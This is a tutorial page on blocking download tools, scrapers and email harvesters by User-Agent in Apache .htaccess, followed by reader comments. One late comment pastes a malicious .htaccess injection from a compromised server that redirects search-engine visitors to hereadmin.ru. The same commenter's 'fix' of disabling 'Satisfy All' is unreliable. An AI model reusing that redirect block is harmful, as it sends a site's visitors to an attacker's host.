
Block Bad robots, spiders, crawlers and harvesters




There are lots of examples across the internet that use mod_rewrite, and we will provide one as well. But what can you do when mod_rewrite is not available? We can use the SetEnvIfNoCase directive in combination with FilesMatch.

SetEnvIfNoCase user-agent  "^BlackWidow" bad_bot=1
SetEnvIfNoCase user-agent  "^Bot\ mailto:craftbot@yahoo.com" bad_bot=1
SetEnvIfNoCase user-agent  "^ChinaClaw" bad_bot=1
SetEnvIfNoCase user-agent  "^Custo" bad_bot=1
SetEnvIfNoCase user-agent  "^DISCo" bad_bot=1
SetEnvIfNoCase user-agent  "^Download\ Demon" bad_bot=1
SetEnvIfNoCase user-agent  "^eCatch" bad_bot=1
SetEnvIfNoCase user-agent  "^EirGrabber" bad_bot=1
SetEnvIfNoCase user-agent  "^EmailSiphon" bad_bot=1
SetEnvIfNoCase user-agent  "^EmailWolf" bad_bot=1
SetEnvIfNoCase user-agent  "^Express\ WebPictures" bad_bot=1
SetEnvIfNoCase user-agent  "^ExtractorPro" bad_bot=1
SetEnvIfNoCase user-agent  "^EyeNetIE" bad_bot=1
SetEnvIfNoCase user-agent  "^FlashGet" bad_bot=1
SetEnvIfNoCase user-agent  "^GetRight" bad_bot=1
SetEnvIfNoCase user-agent  "^GetWeb!" bad_bot=1
SetEnvIfNoCase user-agent  "^Go!Zilla" bad_bot=1
SetEnvIfNoCase user-agent  "^Go-Ahead-Got-It" bad_bot=1
SetEnvIfNoCase user-agent  "^GrabNet" bad_bot=1
SetEnvIfNoCase user-agent  "^Grafula" bad_bot=1
SetEnvIfNoCase user-agent  "^HMView" bad_bot=1
SetEnvIfNoCase user-agent  "HTTrack" bad_bot=1
SetEnvIfNoCase user-agent  "^Image\ Stripper" bad_bot=1
SetEnvIfNoCase user-agent  "^Image\ Sucker" bad_bot=1
SetEnvIfNoCase user-agent  "Indy\ Library" bad_bot=1
SetEnvIfNoCase user-agent  "^InterGET" bad_bot=1
SetEnvIfNoCase user-agent  "^Internet\ Ninja" bad_bot=1
SetEnvIfNoCase user-agent  "^JetCar" bad_bot=1
SetEnvIfNoCase user-agent  "^JOC\ Web\ Spider" bad_bot=1
SetEnvIfNoCase user-agent  "^larbin" bad_bot=1
SetEnvIfNoCase user-agent  "^LeechFTP" bad_bot=1
SetEnvIfNoCase user-agent  "^Mass\ Downloader" bad_bot=1
SetEnvIfNoCase user-agent  "^MIDown\ tool" bad_bot=1
SetEnvIfNoCase user-agent  "^Mister\ PiX" bad_bot=1
SetEnvIfNoCase user-agent  "^Navroad" bad_bot=1
SetEnvIfNoCase user-agent  "^NearSite" bad_bot=1
SetEnvIfNoCase user-agent  "^NetAnts" bad_bot=1
SetEnvIfNoCase user-agent  "^NetSpider" bad_bot=1
SetEnvIfNoCase user-agent  "^Net\ Vampire" bad_bot=1
SetEnvIfNoCase user-agent  "^NetZIP" bad_bot=1
SetEnvIfNoCase user-agent  "^Octopus" bad_bot=1
SetEnvIfNoCase user-agent  "^Offline\ Explorer" bad_bot=1
SetEnvIfNoCase user-agent  "^Offline\ Navigator" bad_bot=1
SetEnvIfNoCase user-agent  "^PageGrabber" bad_bot=1
SetEnvIfNoCase user-agent  "^Papa\ Foto" bad_bot=1
SetEnvIfNoCase user-agent  "^pavuk" bad_bot=1
SetEnvIfNoCase user-agent  "^pcBrowser" bad_bot=1
SetEnvIfNoCase user-agent  "^RealDownload" bad_bot=1
SetEnvIfNoCase user-agent  "^ReGet" bad_bot=1
SetEnvIfNoCase user-agent  "^SiteSnagger" bad_bot=1
SetEnvIfNoCase user-agent  "^SmartDownload" bad_bot=1
SetEnvIfNoCase user-agent  "^SuperBot" bad_bot=1
SetEnvIfNoCase user-agent  "^SuperHTTP" bad_bot=1
SetEnvIfNoCase user-agent  "^Surfbot" bad_bot=1
SetEnvIfNoCase user-agent  "^tAkeOut" bad_bot=1
SetEnvIfNoCase user-agent  "^Teleport\ Pro" bad_bot=1
SetEnvIfNoCase user-agent  "^VoidEYE" bad_bot=1
SetEnvIfNoCase user-agent  "^Web\ Image\ Collector" bad_bot=1
SetEnvIfNoCase user-agent  "^Web\ Sucker" bad_bot=1
SetEnvIfNoCase user-agent  "^WebAuto" bad_bot=1
SetEnvIfNoCase user-agent  "^WebCopier" bad_bot=1
SetEnvIfNoCase user-agent  "^WebFetch" bad_bot=1
SetEnvIfNoCase user-agent  "^WebGo\ IS" bad_bot=1
SetEnvIfNoCase user-agent  "^WebLeacher" bad_bot=1
SetEnvIfNoCase user-agent  "^WebReaper" bad_bot=1
SetEnvIfNoCase user-agent  "^WebSauger" bad_bot=1
SetEnvIfNoCase user-agent  "^Website\ eXtractor" bad_bot=1
SetEnvIfNoCase user-agent  "^Website\ Quester" bad_bot=1
SetEnvIfNoCase user-agent  "^WebStripper" bad_bot=1
SetEnvIfNoCase user-agent  "^WebWhacker" bad_bot=1
SetEnvIfNoCase user-agent  "^WebZIP" bad_bot=1
SetEnvIfNoCase user-agent  "^Widow" bad_bot=1
SetEnvIfNoCase user-agent  "^WWWOFFLE" bad_bot=1
SetEnvIfNoCase user-agent  "^Xaldon\ WebSpider" bad_bot=1
SetEnvIfNoCase user-agent  "^Zeus" bad_bot=1
<FilesMatch "(.*)">
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</FilesMatch>  

How does it work? If a string or regular expression matches the User-Agent HTTP header, the bad_bot environment variable is set. The FilesMatch block then tells the server to deny access (return a 403 Forbidden page) to every user/bot that matched any of the strings above.
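The matching semantics can be illustrated outside Apache. Here is a minimal Python sketch (not part of the .htaccess itself, just an illustration) of why most patterns above start with ^ while a few, like HTTrack and Indy Library, do not:

```python
import re

# Most patterns in the list are anchored to the start of the
# User-Agent header; a few (HTTrack, Indy Library) match anywhere.
anchored = re.compile(r"^Teleport Pro", re.IGNORECASE)
anywhere = re.compile(r"HTTrack", re.IGNORECASE)

# An anchored pattern only catches agents that *start* with the string:
assert anchored.search("Teleport Pro/1.29")
assert not anchored.search("Mozilla (Teleport Pro)")

# An unanchored one catches the string wherever it appears, which is
# why HTTrack and Indy Library are written without the ^:
assert anywhere.search("Mozilla/4.5 (compatible; HTTrack 3.0x)")
```

In the .htaccess list itself, literal spaces are escaped as `\ `, and SetEnvIfNoCase makes the match case-insensitive regardless of how the pattern is written.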


And of course, here is the mod_rewrite-based example:

RewriteEngine On 
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.* - [F,L]

What does it do? Each RewriteCond checks the User-Agent header against a string or regular expression; the conditions are chained with [OR], so a single match is enough. When there is a match, the RewriteRule serves a 403 Forbidden page.
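Before adding entries like these, it is worth checking which user agents actually hit your site. A minimal sketch of that (the log lines below are fabricated examples; adjust the parsing to your server's actual log format, assumed here to be Apache's "combined" format):

```python
import re
from collections import Counter

# In the Apache "combined" log format the User-Agent is the last
# double-quoted field on the line; this regex grabs it.
UA_RE = re.compile(r'"([^"]*)"\s*$')

def count_user_agents(lines):
    """Count occurrences of each User-Agent string in access-log lines."""
    counts = Counter()
    for line in lines:
        m = UA_RE.search(line)
        if m:
            counts[m.group(1)] += 1
    return counts

# Example usage with two fabricated log lines:
sample = [
    '1.2.3.4 - - [01/Jan/2020:00:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "WebZIP/5.0"',
    '1.2.3.4 - - [01/Jan/2020:00:00:01 +0000] "GET /a HTTP/1.1" 200 512 "-" "WebZIP/5.0"',
]
top = count_user_agents(sample).most_common()
```

Running something like this over your real access log shows which agents are worth blocking, rather than copying a stock list blindly.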


  1. How to block users from accessing your site based on their IP address
  2. How to prevent or allow directory listing?
  3. How to change the error documents – 404 Page Not Found, etc
  4. Using .htaccess for password protecting your folders
  5. Using .htaccess to block referrer spam
  6. Disable Hot-Linking of images and other files
  7. Redirect URLs using .htaccess
  8. Introduction to mod_rewrite and some basic examples
  9. Force SSL/https using .htaccess and mod_rewrite
  10. 301 Permanent redirects for parked domain names
  11. Enable CGI, SSI with .htaccess
  12. How to add Mime-Types using .htaccess
  13. Change default directory page
  14. Block Bad robots, spiders, crawlers and harvesters
  15. Make PHP to work in your HTML files with .htacess
  16. Change PHP variables using .htaccess
  17. HTTP Authentication with PHP running as CGI/SuExec
  18. Force www vs non-www to avoid duplicate content on Google
  19. Duplicate content fix index.html vs / (slash only)

Comments (24)

Leo Cabral Said,
Aug 04, 2006 @ 12:25

Dude, thanks a lot!

Great list. Saved my life/bandwidth! :D
Just Helping Said,
Dec 03, 2006 @ 01:02

The line ending with "Indy\ Library" [NC,OR] needs a "bad_bot=1" at the end of it.
Fuctweb Said,
Jun 19, 2007 @ 10:42

Great post! Twiceler = GET OFF ME :)
Nox Said,
Jan 18, 2008 @ 05:42

Awesome - Thanks for the Great Posting

Question: what is this entry for? (Mail?)

RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]

And why do HTTrack and Indy not have the ^ symbol?
thx
eligio Said,
Jan 18, 2008 @ 10:46

awesome list! already installed on my game site, hope it work. thanks :D
berrada Said,
Aug 07, 2008 @ 09:25

Not really something wonderful, thank you very much
Palestine Students Forum Said,
Oct 20, 2008 @ 14:23

Is this helpful for forums?
Dmitry Agafonov Said,
Sep 12, 2009 @ 01:41

Be careful: by blindly copying this list you can block a lot of perfectly harmless users. FlashGet, for example, is a download manager, not a bot. I recommend looking at your server logs, finding the User-Agents of the robots that actually visit your site, and blocking those. That approach will also pay off in terms of server load.
Wondering Said,
Oct 18, 2009 @ 00:34

Where do you put this code? In a robot.txt or on the html page?
Cenk Said,
Oct 21, 2009 @ 03:32

Thanks. Great post!

Wondering:
In .htaccess file on the root directory.
ganool Said,
Jan 24, 2010 @ 08:46

GOD..
thx buddy,,
u save my VPS..

please update it if there is a new bad bot...
because we know that bad bot can change their http_user_agent
ebtsama Said,
Apr 06, 2010 @ 22:24

thanks so mush
Soultrex Said,
May 09, 2010 @ 16:59

Thank to the explanation.
teleport pro Said,
Sep 19, 2010 @ 10:53

After copying/pasting the code into the .htaccess in the server root, I can still use Teleport Pro to download all the website contents.
enigma1 Said,
Sep 19, 2010 @ 11:30

It's a total waste of time to rely on the User-Agent header to identify the client.

Leaving aside the fact that the various scraping tools let the operator customize the user agent, browsers, firewalls and other installed tools also have options that let the user set the headers however he likes.

You cannot rely on client headers to identify anything. The only reliable field is the remote IP/port:

$ip = $_SERVER['REMOTE_ADDR'];

At best you can use the User-Agent to validate the client's declared intention, i.e. whether it wants to be treated as a spider or a human. But that is only good for the popular spiders that carry documented signatures, and even then it needs to be cross-referenced with the IP.
Ashwini - UnicHost Said,
Dec 25, 2010 @ 15:28

I have already implemented that while working on the project.
If anybody wants to go further, can use temporary IP block with multiple requests more than 20/sec or as per your site requirement, within the firewall settings. It helps a lot.
Thanks for sharing.
Ashwini.
Lotto Cheatah Said,
May 22, 2011 @ 11:20

do I need to manually replace the mod_rewrite.c file with the one above for this .htaccess file to work?
James Said,
Aug 19, 2011 @ 15:52

Dude great list. But here I want to mention that there is a website http://foolbots.com with weird concept of passing the bad robots from one website to another website.
Legendofmir Said,
Dec 23, 2011 @ 12:33

I have a huge problem: with Apache on WinXP SP3 everything works fine, but something keeps creating a .htaccess file in every PHP folder. I want to stop these .htaccess files from being created. Which files or scripts do I need to enable/disable to stop this?

This script appear in .htaccess:


RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://hereadmin.ru/kernel/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://hereadmin.ru/kernel/index.php [R=301,L]


I blocked this site in ZoneAlarm so it can't connect to the internet, but I want to disable whatever is creating these files.
Legendofmir Said,
Dec 24, 2011 @ 02:51

Never mind! I fixed it! In httpd.conf for Apache I disabled:

# Satisfy All

Now it's OK!

Merry X-mas to all!!